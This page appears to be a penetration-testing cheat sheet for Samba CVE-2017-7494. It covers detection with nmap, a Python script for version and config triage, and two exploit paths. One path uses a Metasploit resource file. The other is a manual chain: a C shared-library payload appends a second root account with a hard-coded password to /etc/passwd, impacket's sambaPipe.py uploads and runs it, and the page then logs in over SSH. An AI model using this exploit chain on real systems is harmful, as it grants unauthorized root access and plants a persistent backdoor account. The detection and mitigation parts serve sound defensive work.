Manual exploits on exploit-db (without Metasploit) or on GitHub do not seem to work.
Detection
IP=x.x.x.x
nmap -Pn --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version -p445 $IP
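The nmap check-version probe above decides from the Samba version string alone. As an added example (not part of the original page), the same decision written out, together with a check for the advisory's smb.conf workaround (nt pipe support = no), so a host can be triaged as patched, mitigated or still exposed; the fixed-version numbers are those published in the Samba advisory for CVE-2017-7494, and the banner and config fragment are constructed samples.

```python
import re

# Samba releases that fixed CVE-2017-7494 per the Samba advisory: 4.6.4, 4.5.10
# and 4.4.14. Every release from 3.5.0 up to the fix on each branch is affected;
# the 3.5.x .. 4.3.x branches were end-of-life and received no fix release.
FIXED = {(4, 6): (4, 6, 4), (4, 5): (4, 5, 10), (4, 4): (4, 4, 14)}
FIRST_AFFECTED = (3, 5, 0)

def parse_version(banner):
    """(major, minor, patch) from a banner such as 'Samba 4.5.9-Debian', else None."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", banner)
    return tuple(int(x) for x in m.groups()) if m else None

def is_vulnerable(banner):
    """Version-only verdict, the logic a check-version probe applies.
    Caveat: distro builds that backport the fix keep an old version string and
    are reported as vulnerable here; confirm against the package changelog."""
    v = parse_version(banner)
    if v is None or v < FIRST_AFFECTED:
        return False
    branch = v[:2]
    if branch in FIXED:
        return v < FIXED[branch]
    return branch < (4, 4)  # 4.7+ shipped after the fix; 3.5..4.3 never got one

def mitigated_by_config(smb_conf):
    """True when [global] sets 'nt pipe support = no', the advisory's workaround
    that disables the named-pipe path this CVE abuses."""
    section = None
    for raw in smb_conf.splitlines():
        line = raw.split("#")[0].split(";")[0].strip()  # drop smb.conf comments
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "global" and "=" in line:
            key, _, value = line.partition("=")
            if key.strip().lower() == "nt pipe support" and value.strip().lower() in ("no", "false", "0"):
                return True
    return False

def assess(banner, smb_conf):
    """Combine version and configuration into one verdict for a host."""
    if not is_vulnerable(banner):
        return "patched-or-unaffected"
    return "mitigated" if mitigated_by_config(smb_conf) else "VULNERABLE"

# Constructed sample inputs (not taken from any real host).
SAMPLE_BANNER = "Samba 4.5.9-Debian"
SAMPLE_CONF = "[global]\n   workgroup = WORKGROUP\n   nt pipe support = no\n"
```

Feed it the banner nmap or smbclient reports and the host's actual smb.conf; a "VULNERABLE" verdict on a distro build still needs the changelog check noted in the docstring.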
Exploit using Metasploit
When it works, a session is opened. See Metasploit.
msf-smb-exploit.rc
use exploit/linux/samba/is_known_pipename
set RHOSTS x.x.x.x
set SMB_SHARE_NAME MyShare
set SMB_FOLDER /
set SMB::AlwaysEncrypt false
set SMB::ProtocolVersion 1
set VERBOSE true
set ExitOnSession false
exploit -j
Run the exploit
sudo msfconsole -q -r msf-smb-exploit.rc
Exploit manually
payload.c
This payload will add a second root user.
#define _GNU_SOURCE   /* glibc only declares setresuid() with this defined */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* setresuid() */
/* Constructor: runs as soon as the shared object is loaded. */
static void smash() __attribute__((constructor));
void smash() {
    setresuid(0,0,0);
    system("echo root2:$(openssl passwd PreciouS):0:0:root:/root:/bin/bash >> /etc/passwd");
}
Compile the payload (generates a .so)
gcc -o payload.so -shared payload.c -fPIC
Run the exploit
This script will exploit CVE-2017-7494, uploading and executing the shared library specified by the user through the -so parameter.
IP=x.x.x.x
/usr/share/doc/python3-impacket/examples/sambaPipe.py -so payload.so -no-pass -port 445 $IP
Connect to the victim using SSH
ssh root2@x.x.x.x
(enter the password PreciouS when prompted)